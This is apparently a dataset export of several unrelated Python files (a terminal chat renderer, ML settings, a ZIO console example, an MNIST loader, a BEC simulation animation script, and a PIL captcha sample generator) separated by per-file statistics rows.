                    s += ((len(part) - 1) // os.get_terminal_size().columns) + 1
            lines += (((l - 1) // os.get_terminal_size().columns) + 1) + s
        return lines

    def _print_mess(self, sender, text, time, skip, mark):
        """Print one message (plus its skip lines) at the cursor position."""
        if self.is_time:
            print('[{}] '.format(time), end='')
        # color selection for printing sender name
        c0, c1 = 'white', 'grey'
        found = False
        for entry in self.senders:
            if entry['sender'] == sender:
                c = entry['color']
                if c == 'grey':
                    c0, c1 = 'white', 'grey'
                else:
                    c0, c1 = 'grey', c
                # bug fix: the original set ``found = True`` *after*
                # ``break`` (unreachable), so every message appended a
                # duplicate sender entry below
                found = True
                break
        if not found:
            self.senders.append({
                'sender': sender,
                'color': 'grey',
            })
        print(colored('[' + sender + ']', c0, ('on_' + c1)) + ': ', end='')
        print('{}{}'.format(text, ''.join(mark)), end='\n')
        for line in skip:
            print(line)

    def add_mark(self, number, mark):
        """Append ``mark`` to message ``number`` and redraw from it down."""
        if not mark == '' and number > 0 and number <= len(self.MESSAGES):
            self.up_on_message(number)
            msg = self.MESSAGES[len(self.MESSAGES) - number]
            if not msg['mark']:
                msg.update({'mark': [str(mark)]})
            else:
                msg['mark'].append(str(mark))
            self._load(number)

    def edit_mark(self, number, mark):
        """Replace the marks of message ``number``; '' removes them."""
        if number > 0 and number <= len(self.MESSAGES):
            if mark == '':
                self.remove_mark(number)
            else:
                n = len(self.MESSAGES) - number
                self.up_on_message(number)
                self.MESSAGES[n].update({'mark': [str(mark)]})
                self._load(number)

    def remove_mark(self, number):
        """Remove all marks from message ``number``."""
        if number > 0 and number <= len(self.MESSAGES):
            n = len(self.MESSAGES) - number
            self.up_on_message(number)
            self.MESSAGES[n].update({'mark': []})
            self._load(number)

    def has_mark(self, number):
        """Return True if message ``number`` has any marks."""
        n = len(self.MESSAGES) - number
        return self.MESSAGES[n]['mark'] != []

    def get_mark(self, number):
        """Return the mark list of message ``number``.

        (The original class defined ``get_mark`` twice; the earlier,
        shadowed duplicate has been dropped.)
        """
        n = len(self.MESSAGES) - number
        return self.MESSAGES[n]['mark']

    def add_skip(self, number, text):
        """Append an extra line ``text`` under message ``number``."""
        if not text == '' and number > 0 and number <= len(self.MESSAGES):
            self.up_on_message(number)
            msg = self.MESSAGES[len(self.MESSAGES) - number]
            if not msg['skip']:
                msg.update({'skip': [str(text)]})
            else:
                msg['skip'].append(str(text))
            self._load(number)

    def edit_skip(self, number, text):
        """Replace the skip lines of message ``number``; '' removes them."""
        if number > 0 and number <= len(self.MESSAGES):
            if text == '':
                self.remove_skip(number)
            else:
                self.up_on_message(number)
                self.MESSAGES[len(self.MESSAGES) - number].update({
                    'skip': [str(text)]
                })
                self._load(number)

    def remove_skip(self, number):
        """Remove all skip lines from message ``number``."""
        if number > 0 and number <= len(self.MESSAGES):
            self.up_on_message(number)
            self.MESSAGES[len(self.MESSAGES) - number].update({'skip': []})
            self._load(number)

    def has_skip(self, number):
        """Return True if message ``number`` has any skip lines."""
        return self.MESSAGES[len(self.MESSAGES) - number]['skip'] != []

    # reprints the specified number of messages
    def reload(self, number):
        if number > 0 and number < len(self.MESSAGES):
            self.up_on_message(number)
            self._load(number)
        elif number == len(self.MESSAGES):
            self._clear_screen()
            self._print_header()
            self._load(number)

    def _load(self, number):
        # reprint the last `number` messages at the current cursor position
        if number > 0 and number <= len(self.MESSAGES):
            for m in self.MESSAGES[len(self.MESSAGES) - number:len(self.MESSAGES)]:
                self._print_mess(m['sender'], m['text'], m['time'], m['skip'], m['mark'])

    def remove(self, number):
        """Delete message ``number`` and redraw the messages below it."""
        if number > 0 and number <= len(self.MESSAGES):
            self.up_on_message(number)
            self._load(number - 1)
            self.MESSAGES.pop(len(self.MESSAGES) - number)

    def edit(self, number, text):
        """Replace the text of message ``number``; '' deletes the message."""
        if number > 0 and number <= len(self.MESSAGES):
            if text == '':
                self.remove(number)
            else:
                n = len(self.MESSAGES) - number
                self.up_on_message(number)
                self.MESSAGES[n].update({'text': text})
                self._load(number)

    def add_message_top(self, sender, text, time='', skip=None, mark=None, prnt=True):
        """Insert a message at the oldest end of the log.

        Bug fix: ``skip``/``mark`` previously used mutable default
        arguments, so every message created with the defaults shared the
        same list objects.
        """
        skip = [] if skip is None else skip
        mark = [] if mark is None else mark
        text = " ".join(str(text).split())
        if text != '':
            if time == '':
                time = self.get_time()
            self.MESSAGES.insert(0, {
                'sender': sender,
                'text': text,
                'time': time,
                'skip': skip,
                'mark': mark,
            })
            if prnt:
                self.up_on_message(self.get_num_messages() - 1)
                self._print_mess(sender, text, time, skip, mark)
                self._load(self.get_num_messages() - 1)

    def add_message(self, sender, text, time='', skip=None, mark=None):
        """Append a new message and print it (whitespace is normalised)."""
        skip = [] if skip is None else skip
        mark = [] if mark is None else mark
        text = " ".join(str(text).split())
        if text != '':
            if time == '':
                time = self.get_time()
            self.MESSAGES.append({
                'sender': sender,
                'text': text,
                'time': time,
                'skip': skip,
                'mark': mark,
            })
            self._print_mess(sender, text, time, skip, mark)

    def close(self, clr=False):
        """Forget all chat state; optionally clear the screen too."""
        self.MESSAGES.clear()
        self.senders.clear()
        print('\x1b[A\r', end='')
        if clr:
            self._clear_screen()

    def __init__(self, time=False):
        """``time`` is False, 'short' (HH:MM) or 'full' (date + HH:MM)."""
        self.MESSAGES = []
        self.senders = []
        self.header = []
        self.is_time = False
        self.time_full = False
        if time == 'short':
            # 4 chars of "[]: " framing, +8 for the "[HH:MM] " stamp
            self.len_frame = 4 + 8
            self.is_time = True
        elif time == 'full':
            self.len_frame = 4 + 8 + 9
            self.is_time = True
            self.time_full = True
        else:
            self.len_frame = 4
        self._clear_screen()
| 28.390836 | 97 | 0.475648 | 1,179 | 10,533 | 4.128923 | 0.114504 | 0.142975 | 0.101684 | 0.07765 | 0.542317 | 0.455218 | 0.417625 | 0.33977 | 0.278554 | 0.271364 | 0 | 0.007979 | 0.393145 | 10,533 | 370 | 98 | 28.467568 | 0.753598 | 0.028007 | 0 | 0.488806 | 0 | 0 | 0.032658 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130597 | false | 0 | 0.018657 | 0.011194 | 0.201493 | 0.063433 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d919543d1b1062c7801bafa6f3961d97bf6f7fb6 | 850 | py | Python | src/settings.py | doksketch/happy-dating | 680c63f38fe039b6567f5fce94c3d0fa3b968019 | [
"MIT"
] | null | null | null | src/settings.py | doksketch/happy-dating | 680c63f38fe039b6567f5fce94c3d0fa3b968019 | [
"MIT"
] | null | null | null | src/settings.py | doksketch/happy-dating | 680c63f38fe039b6567f5fce94c3d0fa3b968019 | [
"MIT"
] | null | null | null | logreg_params = dict(multi_class='ovr',
class_weight=None,
random_state=43,
max_iter=300,
n_jobs=-1,
penalty='l2',
C=0.5)
rnn_params = dict(
# Пути к данным
df="../coleridgeinitiative-show-us-the-data/train_splitted.csv",
vectorizer_file="vectorizer.json",
model_state_file="model.pth",
save_dir="../models",
# Гиперпараметры архитектуры нейросети
char_embedding_size=64,
rnn_hidden_size=16,
# Гиперпараметры тренировки нейросети
num_epochs=300,
learning_rate=1e-2,
batch_size=32,
seed=1337,
early_stopping_criteria=5,
# Runtime hyper parameter
cuda=True,
catch_keyboard_interrupt=True,
reload_from_files=False,
expand_filepaths_to_save_dir=True
) | 29.310345 | 68 | 0.615294 | 99 | 850 | 4.989899 | 0.818182 | 0.040486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041391 | 0.289412 | 850 | 29 | 69 | 29.310345 | 0.77649 | 0.129412 | 0 | 0 | 0 | 0 | 0.130435 | 0.078804 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d91a437d3329267d3f78bc766ee6ddef015b51b1 | 1,741 | py | Python | examples/zio_console_example.py | miiohio/ziopy | c216bfb834f08bce0419a906b9bf174697d06023 | [
"MIT"
] | 28 | 2021-03-03T16:29:36.000Z | 2022-03-31T05:05:59.000Z | examples/zio_console_example.py | miiohio/ziopy | c216bfb834f08bce0419a906b9bf174697d06023 | [
"MIT"
] | 1 | 2019-10-08T20:09:47.000Z | 2019-10-08T20:09:47.000Z | examples/zio_console_example.py | harveywi/ziopy | c216bfb834f08bce0419a906b9bf174697d06023 | [
"MIT"
] | 1 | 2022-01-28T15:37:43.000Z | 2022-01-28T15:37:43.000Z | from typing import NoReturn, Union
import ziopy.services.console as console
import ziopy.services.system as system
from ziopy.environments import ConsoleSystemEnvironment
from ziopy.services.console import Console, LiveConsole
from ziopy.zio import ZIO, ZIOMonad, monadic, unsafe_run, Environment
@monadic
def program(
    do: ZIOMonad[Console, Union[EOFError, KeyboardInterrupt]]
) -> ZIO[
    Console,
    Union[EOFError, KeyboardInterrupt],
    str
]:
    """Greet the user by name, then count a value up to 20 via chained ZIO effects."""
    console_env = do << Environment()
    do << console_env.print("Hello, what is your name?")
    user_name = do << console_env.input()
    do << console_env.print(f"Your name is: {user_name}")
    counter = do << ZIO.succeed(1)
    while counter < 20:
        # Net effect of the chain below is a single increment (+1, -1, +1);
        # it exists to demonstrate map/flat_map composition.
        step = (
            ZIO.succeed(counter)
            .map(lambda a: a + 1)
            .flat_map(lambda b: ZIO.succeed(b - 1))
            .flat_map(lambda c: ZIO.succeed(c + 1))
        )
        counter = do << step
    do << console_env.print(f"The value of x is: {counter}")
    return ZIO.succeed(f"Hello, {user_name}!")
# Supply the live console implementation; `p` is a pure description of the effect.
p = program().provide(LiveConsole())
final_result = unsafe_run(p)
print(f"Final result (1) is: {final_result}")
# You can run the same program (value) over and over again.
final_result_2 = unsafe_run(p)
print(f"Final result (2) is: {final_result_2}")
@monadic
def prog(
    do: ZIOMonad[ConsoleSystemEnvironment, NoReturn]
) -> ZIO[ConsoleSystemEnvironment, NoReturn, int]:
    """Prompt for the user's age (falling back to 21 on a parse failure), echo it, return it."""
    # Parser pipeline: stringify input, parse as int, capture ValueError as an
    # Either instead of raising, then expose the whole thing as a plain callable.
    parse_age = ZIO.from_callable(str).map(int).catch(ValueError).either().to_callable()
    age = do << console.get_input_from_console(
        prompt="How old are you?\n",
        parse_value=parse_age,
        default_value=21
    )
    do << console.print(f"You are {age} years old.")
    return ZIO.succeed(age)
# Run `prog` with a composite environment supplying both console and system services.
unsafe_run(
    prog().provide(
        ConsoleSystemEnvironment(console=LiveConsole(), system=system.LiveSystem())
    )
)
| 27.203125 | 93 | 0.658817 | 233 | 1,741 | 4.841202 | 0.334764 | 0.053191 | 0.026596 | 0.065603 | 0.047872 | 0.047872 | 0.047872 | 0 | 0 | 0 | 0 | 0.008715 | 0.209075 | 1,741 | 63 | 94 | 27.634921 | 0.810458 | 0.03274 | 0 | 0.040816 | 0 | 0 | 0.115933 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.122449 | 0 | 0.204082 | 0.122449 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d91ba473ca0e37b17defe052cdc5b0b0991183c2 | 1,872 | py | Python | examples/Classify/MNistLoader.py | parrisma/TicTacToe-DeepLearning | 4fefb1ef9d172eb19709f0f2a681307537769f58 | [
"MIT"
] | 1 | 2021-08-17T12:09:48.000Z | 2021-08-17T12:09:48.000Z | examples/Classify/MNistLoader.py | parrisma/TicTacToe-DeepLearning | 4fefb1ef9d172eb19709f0f2a681307537769f58 | [
"MIT"
] | null | null | null | examples/Classify/MNistLoader.py | parrisma/TicTacToe-DeepLearning | 4fefb1ef9d172eb19709f0f2a681307537769f58 | [
"MIT"
] | null | null | null | import os
import struct
import unittest
import numpy as np
#
# Based on https://gist.github.com/akesling/5358964
# which contains the comment:
# > Loosely inspired by http://abel.ee.ucla.edu/cvxopt/_downloads/mnist.py
# > which is GPL licensed.
#
class MNistLoader:
    """Reader for MNIST image/label files stored in the original IDX binary format."""

    # IDX magic numbers (big-endian) identifying the two file types.
    _LABEL_MAGIC = 2049  # 0x00000801: unsigned-byte label vector
    _IMAGE_MAGIC = 2051  # 0x00000803: unsigned-byte 3-D image tensor

    @classmethod
    def read_mnist(cls,
                   training=True,
                   path="."):
        """Load one MNIST split from `path`.

        :param training: if True read the train-* files, else the t10k-* files.
        :param path: directory containing the `*-ubyte` IDX files.
        :return: tuple (img, lbl) — img is a uint8 array of shape
            (num_samples, rows, cols), lbl an int8 array of labels.
        :raises ValueError: if a file's magic number is wrong or the image
            count disagrees with the label count (previously such corrupt
            files were accepted silently and produced garbage arrays).
        """
        if training:
            fname_img = os.path.join(path, 'train-images.idx3-ubyte')
            fname_lbl = os.path.join(path, 'train-labels.idx1-ubyte')
        else:
            fname_img = os.path.join(path, 't10k-images.idx3-ubyte')
            fname_lbl = os.path.join(path, 't10k-labels.idx1-ubyte')

        # Load everything in some numpy arrays
        with open(fname_lbl, 'rb') as flbl:
            magic, num_labels = struct.unpack(">II", flbl.read(8))
            if magic != cls._LABEL_MAGIC:
                raise ValueError("Bad magic number in label file: %d" % magic)
            lbl = np.fromfile(flbl, dtype=np.int8)

        with open(fname_img, 'rb') as fimg:
            magic, num, rows, cols = struct.unpack(">IIII", fimg.read(16))
            if magic != cls._IMAGE_MAGIC:
                raise ValueError("Bad magic number in image file: %d" % magic)
            if num != len(lbl):
                raise ValueError(
                    "Image/label count mismatch: %d vs %d" % (num, len(lbl)))
            img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)

        return img, lbl
#
# Unit Tests.
#
class TestMNISTLoader(unittest.TestCase):
    """Sanity tests for MNistLoader against the real 60k-sample training split."""

    # Data location: overridable via MNIST_DATA_DIR so the test is not tied to
    # one machine (the original hard-coded a Windows user profile path).
    DATA_DIR = os.environ.get("MNIST_DATA_DIR",
                              "C:\\Users\\Admin_2\\Google Drive\\DataSets")

    #
    # Test Image Load.
    #
    def test_0(self):
        # Skip (rather than error) when the dataset is not present locally.
        if not os.path.isfile(os.path.join(self.DATA_DIR, 'train-images.idx3-ubyte')):
            self.skipTest("MNIST training files not found in %s" % self.DATA_DIR)
        ml = MNistLoader()
        img, lbl = ml.read_mnist(training=True,
                                 path=self.DATA_DIR)
        # Training split: 60,000 images of 28x28 pixels, one label per image.
        s = np.shape(img)
        self.assertEqual(len(s), 3)
        self.assertEqual(s[0], 60000)
        self.assertEqual(s[1], 28)
        self.assertEqual(s[2], 28)
        s = np.shape(lbl)
        self.assertEqual(len(s), 1)
        self.assertEqual(s[0], 60000)
        return
#
# Execute the UnitTests.
#
if __name__ == "__main__":
    # Build the suite from the TestCase class. The original instantiated the
    # TestCase and passed the *instance* to loadTestsFromModule (which expects
    # a module object) — that only worked by duck-typing accident.
    suite = unittest.TestLoader().loadTestsFromTestCase(TestMNISTLoader)
    unittest.TextTestRunner().run(suite)
| 25.643836 | 83 | 0.587073 | 234 | 1,872 | 4.606838 | 0.487179 | 0.083488 | 0.037106 | 0.051948 | 0.166976 | 0.109462 | 0.068646 | 0.068646 | 0.068646 | 0 | 0 | 0.031088 | 0.278312 | 1,872 | 72 | 84 | 26 | 0.766839 | 0.142094 | 0 | 0.05 | 0 | 0 | 0.096287 | 0.073002 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d91e5b227907a31856a0adc939b8a34e7e1a5f00 | 3,321 | py | Python | diagnostics/plots/dipole_vids.py | wheelerMT/spin-1_BEC | e8ea34699b4001847c6b4c7451c11be241ce598f | [
"MIT"
] | null | null | null | diagnostics/plots/dipole_vids.py | wheelerMT/spin-1_BEC | e8ea34699b4001847c6b4c7451c11be241ce598f | [
"MIT"
] | null | null | null | diagnostics/plots/dipole_vids.py | wheelerMT/spin-1_BEC | e8ea34699b4001847c6b4c7451c11be241ce598f | [
"MIT"
] | null | null | null | import h5py
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
# Load in data:
# Prompt for the dataset name and open the corresponding HDF5 file read-only.
filename = input('Enter data filename: ')
data_file = h5py.File('../../data/{}.hdf5'.format(filename), 'r')

# Spin-1 condensate wavefunction components (m = +1, 0, -1 Zeeman levels).
# NOTE(review): slicing below implies shape (Nx, Ny, Nframes) — confirm.
psi_plus = data_file['wavefunction/psi_plus']
psi_0 = data_file['wavefunction/psi_0']
psi_minus = data_file['wavefunction/psi_minus']

# Other variables:
# Spatial grid, grid spacings, and 2-D mesh for contour plotting.
x, y = data_file['grid/x'], data_file['grid/y']
dx, dy = x[1] - x[0], y[1] - y[0]
X, Y = np.meshgrid(x[:], y[:])

# Loading time variables:
# Nt = number of time steps, dt = step size, Nframe = steps between saved frames.
Nt, dt, Nframe = np.array(data_file['time/Nt']), np.array(data_file['time/dt']), np.array(data_file['time/Nframe'])
num_of_frames = psi_plus.shape[-1]

# Calculate initial spin expectation:
# dens = total density, F_perp = transverse spin, Fz = longitudinal spin;
# spin_expec_mag = |<F>| normalised by the density.
dens = abs(psi_plus[:, :, 0]) ** 2 + abs(psi_0[:, :, 0]) ** 2 + abs(psi_minus[:, :, 0]) ** 2
F_perp = np.sqrt(2) * (np.conj(psi_plus[:, :, 0]) * psi_0[:, :, 0] + np.conj(psi_0[:, :, 0]) * psi_minus[:, :, 0])
Fz = abs(psi_plus[:, :, 0]) ** 2 - abs(psi_minus[:, :, 0]) ** 2
spin_expec_mag = np.sqrt(Fz ** 2 + abs(F_perp) ** 2) / dens
# Set up figure:
# Three panels sharing the y-axis: |psi_+|^2, |psi_-|^2, and spin magnitude.
fig, ax = plt.subplots(1, 3, sharey=True, figsize=(10, 10))
ax[0].set_ylabel(r'$y / \xi_s$')
ax[0].set_title(r'$|\psi_+|^2$')
ax[1].set_title(r'$|\psi_-|^2$')
ax[2].set_title(r'$|<\vec{F}>|$')
for axis in ax:
    axis.set_xlabel(r'$x / \xi_s$')
# Fixed contour levels 0..1 so the colour scale is constant across frames.
cvals_dens = np.linspace(0, 1, 25, endpoint=True)
cvals_spin = np.linspace(0, 1, 25, endpoint=True)

# Initial frame plot:
densPlus_plot = ax[0].contourf(X, Y, abs(psi_plus[:, :, 0]) ** 2, cvals_dens, cmap='gnuplot')
densMinus_plot = ax[1].contourf(X, Y, abs(psi_minus[:, :, 0]) ** 2, cvals_dens, cmap='gnuplot')
spin_plot = ax[2].contourf(X, Y, spin_expec_mag, cvals_spin, cmap='PuRd')
# `cont` holds the current frame's contour sets; animate() clears and rebuilds it.
cont = [densPlus_plot, densMinus_plot, spin_plot]

# Set up color bars:
dens_cbar = plt.colorbar(densMinus_plot, ax=ax[1], fraction=0.044, pad=0.03)
phase_cbar = plt.colorbar(spin_plot, ax=ax[2], ticks=[0, 1], fraction=0.044, pad=0.03)
for axis in ax:
    axis.set_aspect('equal')
# Annotation with the simulation parameters (condensate density and couplings).
plt.text(-100, 400, r'$n_0 = 1, c_0 = 3.5, c_2 = 0.5$')
def animate(i):
    """Redraw frame `i`: component densities in ax[0]/ax[1], spin magnitude in ax[2].

    Uses the module-level data handles (psi_plus, psi_0, psi_minus, X, Y, ...)
    and the `cont` list of contour sets created for the previous frame.
    """
    global cont
    # Remove the previous frame's contour artists before drawing new ones.
    for contour in cont:
        for c in contour.collections:
            c.remove()
    dens_plus_plot = ax[0].contourf(X, Y, abs(psi_plus[:, :, i]) ** 2, cvals_dens, cmap='gnuplot')
    dens_minus_plot = ax[1].contourf(X, Y, abs(psi_minus[:, :, i]) ** 2, cvals_dens, cmap='gnuplot')

    # Calculate spin expectation (same formulas as the initial-frame setup):
    dens = abs(psi_plus[:, :, i]) ** 2 + abs(psi_0[:, :, i]) ** 2 + abs(psi_minus[:, :, i]) ** 2
    F_perp = np.sqrt(2) * (np.conj(psi_plus[:, :, i]) * psi_0[:, :, i] + np.conj(psi_0[:, :, i]) * psi_minus[:, :, i])
    Fz = abs(psi_plus[:, :, i]) ** 2 - abs(psi_minus[:, :, i]) ** 2
    spin_expec_mag = np.sqrt(Fz ** 2 + abs(F_perp) ** 2) / dens
    spin_plot = ax[2].contourf(X, Y, spin_expec_mag, cvals_spin, cmap='PuRd')

    # Fix: store this frame's contour sets, matching the initial-frame code.
    # The original stored the Axes objects instead, which only worked because
    # Axes.collections happens to expose the same artists.
    cont = [dens_plus_plot, dens_minus_plot, spin_plot]

    print('On density iteration %i' % (i + 1))
    plt.suptitle(r'$\tau$ = %2f' % (Nframe * dt * i), y=0.7)
    return cont
# Calls the animation function and saves the result
anim = animation.FuncAnimation(fig, animate, frames=num_of_frames, repeat=False)
# NOTE(review): filename[7:] strips a fixed 7-character prefix from the user-entered
# name — presumably a directory-like prefix in the naming convention; confirm.
anim.save('../../../plots/spin-1/{}.mp4'.format(filename[7:]), dpi=200,
          writer=animation.FFMpegWriter(fps=60, codec="libx264", extra_args=['-pix_fmt', 'yuv420p']))
print('Density video saved successfully.')
| 39.070588 | 118 | 0.620897 | 563 | 3,321 | 3.507993 | 0.269982 | 0.042532 | 0.03038 | 0.024304 | 0.384304 | 0.355443 | 0.258228 | 0.155949 | 0.108354 | 0.108354 | 0 | 0.045016 | 0.157182 | 3,321 | 84 | 119 | 39.535714 | 0.660593 | 0.076182 | 0 | 0.071429 | 0 | 0 | 0.126719 | 0.023248 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017857 | false | 0 | 0.071429 | 0 | 0.107143 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d924de18914aff5fa9f08bc65617db228d203fc4 | 2,296 | py | Python | gen_sample_by_PIL.py | chldong/cnn_captcha | 3c528ac30b6278bc55f04ac0dd565985ef4d5f52 | [
"Apache-2.0"
] | null | null | null | gen_sample_by_PIL.py | chldong/cnn_captcha | 3c528ac30b6278bc55f04ac0dd565985ef4d5f52 | [
"Apache-2.0"
] | null | null | null | gen_sample_by_PIL.py | chldong/cnn_captcha | 3c528ac30b6278bc55f04ac0dd565985ef4d5f52 | [
"Apache-2.0"
] | null | null | null | # -*- coding: UTF-8 -*-
"""
Generate captcha images using the PIL library (prerequisite: pip install PIL)
"""
from PIL import Image,ImageFont,ImageDraw,ImageFilter
import os
import random
import time
import json
def gen_special_img(text, file_path, width, height):
    """Render `text` centered on a solid background and save it to `file_path`.

    :param text: captcha string to draw.
    :param file_path: destination image path (format inferred from extension).
    :param width: image width in pixels.
    :param height: image height in pixels.
    """
    font_size = 16
    background_color = (102, 142, 107)
    font_color = (112, 66, 60)
    # NOTE: ImageFont.getsize was removed in Pillow 10 — use getbbox/getlength
    # if the Pillow dependency is ever upgraded.
    font = ImageFont.truetype('./simhei.ttf', font_size)

    img = Image.new('RGBA', (width, height), background_color)

    # Center the text horizontally; nudge it up 2px from the vertical center.
    text_width, text_height = font.getsize(text)
    text_left = (width - text_width) / 2
    text_top = (height - text_height) / 2 - 2
    draw = ImageDraw.Draw(img)
    draw.text(xy=(text_left, text_top), text=text, fill=font_color, font=font)

    # Rotate (currently by 0 degrees — a leftover hook for adding distortion)
    # and composite onto a fresh background using the rotated image's alpha as
    # the mask. A dead bare statement `img.rotate` (a no-op attribute access)
    # was removed here.
    rot = img.rotate(0, expand=0)
    fff = Image.new('RGBA', rot.size, background_color)
    img = Image.composite(rot, fff, rot)

    img.save(file_path)  # save the image
def gen_ima_by_batch(root_dir, image_suffix, characters, count, char_count, width, height):
    """Generate `count` captcha sample images into `root_dir`.

    Each filename is "<text>_<timestamp>.<image_suffix>" where <text> is one
    random uppercase A-Z letter followed by `char_count` characters drawn from
    `characters`.

    :param root_dir: output directory (created if missing).
    :param image_suffix: file extension, e.g. "png".
    :param characters: character set to sample the captcha body from.
    :param count: number of images to generate.
    :param char_count: number of characters after the leading letter.
    :param width: image width in pixels.
    :param height: image height in pixels.
    """
    # Ensure the output directory exists.
    if not os.path.exists(root_dir):
        os.makedirs(root_dir)

    for index in range(count):
        # Leading character: a random uppercase letter (chr(65)-chr(90) is A-Z).
        add_al = chr(random.randrange(65, 91))
        # Body: char_count random picks from the configured character set.
        text = add_al + "".join(random.choice(characters) for _ in range(char_count))
        # Timestamp (dots stripped) keeps filenames unique across runs.
        timec = str(time.time()).replace(".", "")
        p = os.path.join(root_dir, "{}_{}.{}".format(text, timec, image_suffix))
        gen_special_img(text, p, width, height)
        print("Generate captcha image => {}".format(index + 1))
def main():
    """Read generation settings from conf/captcha_config.json and generate samples."""
    with open("conf/captcha_config.json", "r") as f:
        config = json.load(f)
    # Configuration parameters
    root_dir = config["root_dir"]  # image output directory
    image_suffix = config["image_suffix"]  # image file extension
    characters = config["characters"]  # character set shown on the images  # characters = "0123456789abcdefghijklmnopqrstuvwxyz"
    count = config["count"]  # how many samples to generate
    char_count = config["char_count"]  # number of characters per image
    # Image height and width
    width = config["width"]
    height = config["height"]
    gen_ima_by_batch(root_dir, image_suffix, characters, count, char_count, width, height)
# Script entry point: generate captcha samples per conf/captcha_config.json.
if __name__ == '__main__':
    main()
| 30.210526 | 104 | 0.642857 | 295 | 2,296 | 4.861017 | 0.420339 | 0.03417 | 0.018131 | 0.02371 | 0.203626 | 0.203626 | 0.203626 | 0.203626 | 0.156206 | 0.156206 | 0 | 0.024876 | 0.212108 | 2,296 | 75 | 105 | 30.613333 | 0.767828 | 0.155488 | 0 | 0 | 0 | 0 | 0.07628 | 0.012539 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0 | 0.106383 | 0 | 0.170213 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |